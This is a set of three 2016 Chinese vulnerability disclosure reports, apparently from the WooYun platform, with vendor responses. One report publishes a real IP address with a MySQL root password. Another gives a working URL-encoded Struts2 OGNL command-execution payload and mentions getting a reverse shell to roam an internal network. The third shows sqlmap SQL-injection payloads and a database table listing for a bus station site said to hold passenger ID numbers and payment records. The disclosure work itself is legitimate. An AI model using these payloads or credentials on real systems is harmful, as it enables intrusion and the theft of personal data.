漏洞详情披露状态： 2016-05-22： 细节已通知厂商并且等待厂商处理中2016-05-22： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-22： 厂商已经主动忽略漏洞，细节向公众公开简要描述： 详细说明：详细说明请往下看↓先来点旁白,啦啦啦本屌又来了，(*^__^*) 嘻嘻无敌的传送门：http://42.51.9.122/漏洞证明： 我草这是什么？GM哇,GM哇，也就是说可以通过数据随意操控游戏，(*^__^*) 嘻嘻好了基友跟女朋友都在催我快点走，本屌就先提交到这把小口令走起：42.51.9.122 root !@#$%^修复方案：修改mysql密码 禁止外部连接版权声明：转载请注明来源 俊俊@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-22 20:40厂商回复：感谢白帽子的报告，经确认，对应IP非爱奇艺PPS所有，暂无法确认并联系上对应的合作方。 谢谢关注爱奇艺PPS安全最新状态：2016-05-23：感谢报告，经多方确认，移动端和PC上均无这款游戏。 因此该IP实际跟PPS没有任何关系。 感谢关注PPS安全

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：RT详细说明： code 区域https://**.**.**.**/checkUidAvailable.action POST redirect%3A%24%7B%23res%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23res.setCharacterEncoding%28%22UTF-8%22%29%2C%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22test%20by%20d%22%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%**.**.**.**.InputStreamReader%28%23b%29%2C%23d%3Dnew%**.**.**.**.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B9%5D%2C%23d.read%28%23e%29%2C%23res.getWriter%28%29.println%28%23e%29%2C%23res.getWriter%28%29.flush%28%29%2C%23res.getWriter%28%29.close%28%29%7D  漏洞证明：https://**.**.**.**/checkUidAvailable.action祭出工具内网的权限，如果反弹一个出来。可以弄到好多敏感信息或者漫游下内网啥的修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-04-29 12:34厂商回复：CNVD未复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：石家庄客运总站某站点SQL注入(含旅客身份证号\手机号\住址\订单时间去向)详细说明： code 区域**.**.**.**/Register.jsp检查用户是否存在code 区域GET **.**.**.**/CheckUserValue?userValue=test HTTP/1.1 Accept: */* Accept-Language: zh-cn Referer: **.**.**.**/Register.jsp Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER) Host: **.**.**.** Connection: Keep-Alive Cookie: JSESSIONID=34130A0B9F153505167935FA37380FC3userValue参数存在注入盲注，直接上SQLMAP漏洞证明： code 区域Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: **.**.**.**:80/CheckUserValue?userValue=admin'and'1'='1' AND 9336=9336 AND 'CUrZ'='CUrZ Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: **.**.**.**:80/CheckUserValue?userValue=admin'and'1'='1' AND 5097=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(118)||CHR(85)||CHR(99),5) AND 'NaxB'='NaxB --- back-end DBMS: Oracle current schema (equivalent to database on Oracle): 'SJZWEB'code 区域Database: SJZWEB +-----------------------+---------+ | Table | Entries | +-----------------------+---------+ | TB_WEB_ERROR | 2980653 | | TB_WEB_USER_LOG | 610631 | | TB_WEB_LOG | 422999 | | TB_IMAGE_VALID | 72548 | | TB_WEB_ALIPAY | 69898 | | TB_WEB_SEAT_LOCK | 33135 | | TB_WEB_ORDER | 26011 | | TB_WEB_USER | 16203 | | TB_WEB_USER_ONLINE | 13147 | | TB_WEB_MSG_SEND | 2033 | | TB_WEB_ORDER_BUILD | 1191 | | TB_CITY | 363 | | TB_NEW_SCHEDULE | 172 | | TB_WEB_TICKETSALE_UPD | 125 | | TB_WEB_ALL_ROUTE | 101 | | TB_PROVINCE | 34 | | TB_WEB_PARAMETER | 13 | | TB_WEB_AD | 8 | | TB_WEB_NEW_SCHEDULE | 8 | | TB_ANSWER_QUESTION | 6 | | TB_GATEWAY | 1 | | TB_WEB_DISCOUNT | 1 | | TB_WEB_SALE_SCHEDULE | 1 | | TB_WEB_SEATPASSWORD | 1 | +-----------------------+---------+用户登陆日志包含用户ip，session用户订单界面，涵盖用户的支付宝订单号，出发地，登陆ip，付款金额，目的地站点名称等详细信息修复方案：过滤敏感字符版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-04-29 10:18厂商回复：CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给河北分中心，由河北分中心后续协调网站管理单位处置。最新状态：暂无